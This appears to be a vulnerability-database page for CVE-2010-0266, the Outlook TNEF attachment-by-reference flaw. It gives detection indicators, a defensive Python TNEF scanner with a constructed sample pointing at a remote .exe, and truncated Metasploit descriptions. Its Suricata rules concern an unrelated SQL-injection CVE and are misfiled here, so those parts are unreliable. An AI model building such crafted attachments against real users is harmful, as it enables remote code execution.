CVE-2010-0266
Published: 2010-07-15
Priority: P266 · critical · CVSS 2.0 base score 9.3, vector AV:N/AC:M/Au:N/C:C/I:C/A:C
Exploit: public exploit code indexed (see the Exploit-DB and Metasploit entries below)
EPSS: 55.28% (98.9th percentile)
Microsoft Office Outlook 2002 SP3, 2003 SP3, and 2007 SP1 and SP2 does not properly verify e-mail attachments with a PR_ATTACH_METHOD property value of ATTACH_BY_REFERENCE, which allows user-assisted remote attackers to execute arbitrary code via a crafted message, aka "Microsoft Outlook SMB Attachment Vulnerability."
Affected (3 ranges):
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | outlook | — | — |
| microsoft | outlook | — | — |
| microsoft | outlook | — | — |
Detection & IOCs (extracted from the indexed sources)
- PR_ATTACH_METHOD = ATTACH_BY_REF_RESOLVE (value 3), as set in the Metasploit module: `attprops << "\x03\x00\x00\x00" # Value data ATTACH_BY_REF_RESOLVE (3)`
- PR_ATTACH_METHOD = ATTACH_BY_REF_ONLY (value 4), as set in the Metasploit module: `attprops << "\x04\x00\x00\x00" # Value data ATTACH_BY_REF_ONLY (4)`
- TNEF signature bytes: `\x78\x9f\x3e\x22`
- TNEF attAttachRenddata fixed bytes: `\x01\x00\xff\xff\xff\xff\x20\x00\x20\x00\x00\x00\x00\x00`
- Detect malicious TNEF (winmail.dat) attachments containing a MAPI PR_ATTACH_METHOD property set to ATTACH_BY_REF_RESOLVE (0x03) or ATTACH_BY_REF_ONLY (0x04) together with a PR_ATTACH_LONG_PATHNAME pointing to a remote UNC or file:// path ending in .exe.
- Inspect inbound email for MIME parts with Content-Type 'application/ms-tnef' and attachment name 'winmail.dat'; parse the TNEF stream for the 0x223e9f78 signature followed by attAttachment (0x9005) blocks containing PR_ATTACH_METHOD values of 3 or 4.
- Alert on WebDAV OPTIONS/PROPFIND requests to port 80 from Outlook processes (WINWORD.EXE, OUTLOOK.EXE) immediately after a TNEF email is opened, as the exploit triggers the WebDAV Mini-Redirector to fetch a remote .exe payload.
- Flag TNEF attachments where PR_ATTACH_LONG_PATHNAME (MAPI property 0x370d) contains a 'file://' URI or a UNC path (\\host\share\) pointing to an executable; this is the mechanism that redirects execution to a remote file.
- Detect TNEF streams where the displayed filename extension (PR_ATTACH_LONG_FILENAME) is a benign image type (e.g. .jpg, .png) while PR_ATTACH_LONG_PATHNAME resolves to a .exe, indicating extension spoofing.
- Monitor for the MAPI message class values 'IPM.Document.txtfile' or 'IPM.Document.jpegfile' in incoming messages; these non-standard classes are used by the exploit to disguise the malicious attachment.
Constraints noted in the sources:
- The Metasploit exploit requires SRVPORT=80 and URIPATH=/ and these cannot be changed; the WebDAV delivery mechanism only works over port 80.
- Exploitation is limited by the fact that attackers cannot supply command-line options to the executed file, restricting payload flexibility.
- The exploit is passive (user-assisted): the victim must double-click the attachment or message for code execution to occur.
- The ATTACH_BY_REF_ONLY variant appends '?.dat' to the remote .exe path in the pathname field, which may bypass naive URL-based detections that only look for bare .exe extensions.
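The TNEF-level checks in the list above, as an added Python example that is not from this page or from any of the indexed sources: it walks a winmail.dat stream for the 0x223e9f78 signature and attAttachment (0x9005) blocks, decodes each MAPI property block, and reports attachments whose PR_ATTACH_METHOD is 3 or 4 and whose PR_ATTACH_LONG_PATHNAME is a UNC or file:// path to an .exe, ignoring the '?.dat' suffix. The attribute and property layouts follow my reading of the TNEF format (MS-OXTNEF), and the sample stream, its 'photo.jpg' display name and the 203.0.113.10 UNC target are constructed for the demonstration.

```python
import struct

TNEF_SIGNATURE = 0x223E9F78   # appears in the stream as bytes 78 9F 3E 22
ATT_ATTACHMENT = 0x9005       # attAttachment: the MAPI property block of one attachment
PR_ATTACH_METHOD, PR_ATTACH_LONG_FILENAME, PR_ATTACH_LONG_PATHNAME = 0x3705, 0x3707, 0x370D
REF_METHODS = {3: "ATTACH_BY_REF_RESOLVE", 4: "ATTACH_BY_REF_ONLY"}
COUNTED = {0x000D, 0x001E, 0x001F, 0x0102}     # PT_OBJECT, PT_STRING8, PT_UNICODE, PT_BINARY
EIGHT_BYTE = {0x0005, 0x0007, 0x0014, 0x0040}  # PT_DOUBLE, PT_APPTIME, PT_I8, PT_SYSTIME; the rest are treated as 4

def mapi_props(block):        # decode a TNEF MAPI property block into {property id: value}
    pos, props = 4, {}
    for _ in range(struct.unpack_from("<I", block)[0]):
        ptype, pid = struct.unpack_from("<HH", block, pos)   # type word, then property id word
        pos += 4
        if ptype in COUNTED:  # value count, then each value as length + data padded to 4 bytes
            nvals, pos, vals = struct.unpack_from("<I", block, pos)[0], pos + 4, []
            for _ in range(nvals):
                ln = struct.unpack_from("<I", block, pos)[0]
                vals.append(block[pos + 4:pos + 4 + ln].decode("utf-16-le" if ptype == 0x001F else "latin-1").rstrip("\x00"))
                pos += 4 + (ln + 3) // 4 * 4
            props[pid] = vals[0] if nvals == 1 else vals
        else:                 # fixed-size value; only PT_LONG (the type of PR_ATTACH_METHOD) is decoded
            if ptype == 0x0003:
                props[pid] = struct.unpack_from("<i", block, pos)[0]
            pos += 8 if ptype in EIGHT_BYTE else 4
    return props

def is_remote_exe(path):      # UNC or file:// target ending in .exe, ignoring a '?...' suffix such as '?.dat'
    base = path.split("?", 1)[0].lower()
    return base.startswith(("\\\\", "file://")) and base.endswith(".exe")

def scan_tnef(data):          # yield (method, displayed name, pathname) per by-reference attachment aimed at a remote .exe
    if struct.unpack_from("<I", data)[0] != TNEF_SIGNATURE:
        raise ValueError("not a TNEF stream")
    pos = 6                   # 4-byte signature + 2-byte attachment key
    while pos < len(data):    # each attribute: level byte, type<<16 | id, length, data, 16-bit checksum
        level, attr, length = struct.unpack_from("<BII", data, pos)
        p = mapi_props(data[pos + 9:pos + 9 + length]) if level == 2 and (attr & 0xFFFF) == ATT_ATTACHMENT else {}
        if p.get(PR_ATTACH_METHOD) in REF_METHODS and is_remote_exe(p.get(PR_ATTACH_LONG_PATHNAME, "")):
            yield REF_METHODS[p[PR_ATTACH_METHOD]], p.get(PR_ATTACH_LONG_FILENAME), p[PR_ATTACH_LONG_PATHNAME]
        pos += 9 + length + 2

def _str8(pid, s):            # one PT_STRING8 value: type, id, count=1, length, NUL-terminated text, padded to 4
    raw = s.encode("latin-1") + b"\x00"
    return struct.pack("<HHII", 0x001E, pid, 1, len(raw)) + raw + b"\x00" * (-len(raw) % 4)

_PROPS = (struct.pack("<IHHi", 3, 0x0003, PR_ATTACH_METHOD, 4) + _str8(PR_ATTACH_LONG_FILENAME, "photo.jpg")
          + _str8(PR_ATTACH_LONG_PATHNAME, r"\\203.0.113.10\share\photo.exe?.dat"))   # constructed, not a real capture
SAMPLE = (struct.pack("<IHBII", TNEF_SIGNATURE, 0, 2, (0x0006 << 16) | ATT_ATTACHMENT, len(_PROPS))
          + _PROPS + struct.pack("<H", sum(_PROPS) & 0xFFFF))   # one attAttachment attribute with its checksum
```

Running `list(scan_tnef(SAMPLE))` on the constructed stream reports one ATTACH_BY_REF_ONLY attachment whose displayed name is photo.jpg but whose pathname is the UNC .exe, which covers both the by-reference and the extension-spoofing checks listed above.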
Suricata · 2010-07-30 · CVSS 7.5 · CVE-2007-0266 [HIGH]
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid DELETE"; flow:established,to_server; http.uri; content:"/boxx/ShowAppendix.asp?"; nocase; content:"iid="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-0266; reference:url,www.securityfocus.com/archive/1/archive/1/456699/100/0/threaded; classtype:web-application-attack; sid:2005618; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_
Suricata · 2010-07-30 · CVSS 7.5 · CVE-2007-0266 [HIGH]
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid INSERT"; flow:established,to_server; http.uri; content:"/boxx/ShowAppendix.asp?"; nocase; content:"iid="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-0266; reference:url,www.securityfocus.com/archive/1/archive/1/456699/100/0/threaded; classtype:web-application-attack; sid:2005617; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_
Suricata · 2010-07-30 · CVSS 7.5 · CVE-2007-0266 [HIGH]
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid SELECT"; flow:established,to_server; http.uri; content:"/boxx/ShowAppendix.asp?"; nocase; content:"iid="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-0266; reference:url,www.securityfocus.com/archive/1/archive/1/456699/100/0/threaded; classtype:web-application-attack; sid:2005615; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_
Suricata · 2010-07-30 · CVSS 7.5 · CVE-2007-0266 [HIGH]
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UPDATE"; flow:established,to_server; http.uri; content:"/boxx/ShowAppendix.asp?"; nocase; content:"iid="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-0266; reference:url,www.securityfocus.com/archive/1/archive/1/456699/100/0/threaded; classtype:web-application-attack; sid:2005620; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_1
Suricata · 2010-07-30 · CVSS 7.5 · CVE-2007-0266 [HIGH]
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid UNION SELECT"; flow:established,to_server; http.uri; content:"/boxx/ShowAppendix.asp?"; nocase; content:"iid="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-0266; reference:url,www.securityfocus.com/archive/1/archive/1/456699/100/0/threaded; classtype:web-application-attack; sid:2005616; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, update
Suricata · 2010-07-30 · CVSS 7.5 · CVE-2007-0266 [HIGH]
ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Ezboxx Portal System Beta SQL Injection Attempt -- ShowAppendix.asp iid ASCII"; flow:established,to_server; http.uri; content:"/boxx/ShowAppendix.asp?"; nocase; content:"iid="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-0266; reference:url,www.securityfocus.com/archive/1/archive/1/456699/100/0/threaded; classtype:web-application-attack; sid:2005619; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_
Exploit-DB · 2010-09-20 · CVE-2010-0266
Microsoft Outlook - 'ATTACH_BY_REF_RESOLVE' File Execution (MS10-045) (Metasploit)
---
```ruby
##
# $Id: ms10_045_outlook_ref_resolve.rb 10389 2010-09-20 04:38:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # (the lines between the class declaration and 'Name' are not in the excerpt)

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Outlook ATTACH_BY_REF_RESOLVE File Execution',
      'Description' => %q{
          It has been discovered that certain e-mail messages cause Outlook to create Windows
          shortcut-like attachments or messages within Outlook. Through specially crafted TNEF
          streams with certain MAPI attachment properties, it is possible to set a path name
          to files to be
```
Exploit-DB · 2010-09-20 · CVE-2010-0266
Microsoft Outlook - 'ATTACH_BY_REF_ONLY' File Execution (MS10-045) (Metasploit)
---
```ruby
##
# $Id: ms10_045_outlook_ref_only.rb 10389 2010-09-20 04:38:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  # (the lines between the class declaration and 'Name' are not in the excerpt)

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Outlook ATTACH_BY_REF_ONLY File Execution',
      'Description' => %q{
          It has been discovered that certain e-mail messages cause Outlook to create Windows
          shortcut-like attachments or messages within Outlook. Through specially crafted TNEF
          streams with certain MAPI attachment properties, it is possible to set a path name
          to files to be executed.
```
Metasploit
Outlook ATTACH_BY_REF_ONLY File Execution
It has been discovered that certain e-mail messages cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double-clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These files can be local files, but files stored remotely (on a file share, for example) can also be used. Exploitation is limited by the fact that it is not possible for attackers to supply command line options.
Metasploit
Outlook ATTACH_BY_REF_RESOLVE File Execution
It has been discovered that certain e-mail messages cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double-clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These files can be local files, but also files stored remotely, for example on a file share. Exploitation is limited by the fact that it is not possible for attackers to supply command line options.
No writeups or analysis indexed.
References
- http://www.us-cert.gov/cas/techalerts/TA10-194A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-045
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11623